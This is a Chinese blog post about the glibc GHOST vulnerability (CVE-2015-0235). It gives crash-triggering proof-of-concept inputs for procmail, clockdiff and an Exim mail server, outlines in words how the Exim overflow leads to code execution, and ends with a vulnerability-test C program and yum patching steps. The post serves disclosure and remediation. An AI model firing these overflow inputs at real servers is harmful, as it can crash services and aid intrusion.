良玉的博客 点点滴滴,积水成河_良玉的博客_页游、手游linux运维工程师之路

CVE-2015-0235:Linux Glibc幽灵漏洞允许黑客远程获取系统权限及分析及修复

幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者在不了解系统的任何情况下远程获取操作系统控制权限。目前他的CVE编号为CVE-2015-0235。

什么是glibc

glibc是GNU发布的libc库,即c运行库。glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc。glibc除了封装linux操作系统所提供的系统服务外,它本身也提供了许多其它一些必要功能服务的实现。glibc 囊括了几乎所有的 UNIX 通行的标准。

漏洞描述:

glibc的__nss_hostname_digits_dots存在缓冲区溢出漏洞,导致使用gethostbyname系列函数的某些软件存在命令执行或者信息泄露的安全风险。

原因:

glibc\nss\digits_dots.c 的__nss_hostname_digits_dots函数未加验证的使用 strcpy (hostname, name),导致缓冲区溢出。

影响范围:

本地

某些环境下的procmail受影响

执行命令:

1
/usr/bin/procmail "$_COMSAT_"12345670 "$_COMSAT_"123456701234 < /dev/null

错误信息:

procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000]

某些环境下的clockdiff受影响

执行命令:

1
/usr/sbin/clockdiff `python -c "print '0' * $((0x20000-16*1-2*4-1-4))"`

错误信息

clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000]

【远程】

特殊配置的Exim mail server受该漏洞影响

执行命令:

1
2
user@...ian-7-7-64b:~$ python -c "print '0' * $((0x500-16*1-2*8-1-8))"
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

 

1
2
3
4
5
6
user@...ian-7-7-64b:~$ telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 debian-7-7-64b ESMTP Exim 4.80 ...
HELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

错误信息:

exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]

利用:

1. 代码执行

在exim中覆盖next指针,实现在任意内存写任意内容。

2. 信息泄露

向exim发送畸形包,通过返回的错误信息,判断32位还是64位



测试漏洞是否存在: 


把下面的代码保存为gistfile1.c

#include <netdb.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <errno.h>  
   
#define CANARY "in_the_coal_mine"  
   
struct {  
  char buffer[1024];  
  char canary[sizeof(CANARY)];  
} temp = { "buffer", CANARY };  
   
int main(void) {  
  struct hostent resbuf;  
  struct hostent *result;  
  int herrno;  
  int retval;  
   
  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/  
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;  
  char name[sizeof(temp.buffer)];  
  memset(name, '0', len);  
  name[len] = '\0';  
   
  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);  
   
  if (strcmp(temp.canary, CANARY) != 0) {  
    puts("vulnerable");  
    exit(EXIT_SUCCESS);  
  }  
  if (retval == ERANGE) {  
    puts("not vulnerable");  
    exit(EXIT_SUCCESS);  
  }  
  puts("should not happen");  
  exit(EXIT_FAILURE);  
}



然后在服务器上执行:

  1. gcc gistfile1.c -o CVE-2015-0235  

  2. ./CVE-2015-0235  

如果提示:vulnerable 就说明存在漏洞.


修bug吧!!!各种升级!!!

修复方法:

执行这些命令即可

  1. yum clean all   

  2. yum makecache  

  3. yum -y install glibc*   

留言列表
发表评论
来宾的头像